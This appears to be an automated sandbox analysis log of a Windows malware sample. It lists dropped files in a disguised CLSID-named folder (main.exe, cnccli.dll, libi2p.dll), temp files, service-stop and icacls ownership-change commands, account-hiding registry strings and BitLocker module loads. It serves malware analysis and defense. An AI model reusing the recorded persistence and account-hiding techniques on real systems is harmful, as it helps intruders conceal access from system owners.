Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\HwfABz7s	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\TLN3Eh0f	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\zFE1sfMY	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\zCUeqzwC	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\DYoNFfUY	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\kInii6kX	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\9qaNW6z6	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\j8fz8FfX	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Jcf8nu5c	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\HwfABz7s	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\TLN3Eh0f	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\zFE1sfMY	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\zCUeqzwC	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\DYoNFfUY	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\zFE1sfMY	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\zCUeqzwC	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\j8fz8FfX	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\kInii6kX	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\HwfABz7s	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Jcf8nu5c	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\9qaNW6z6	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\TLN3Eh0f	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\DYoNFfUY	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF6EF651DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF6EF651DBC

Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe

Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000003.1975278943.000001FC7A526000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000003.1975278943.000001FC7A526000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe

Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18

Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
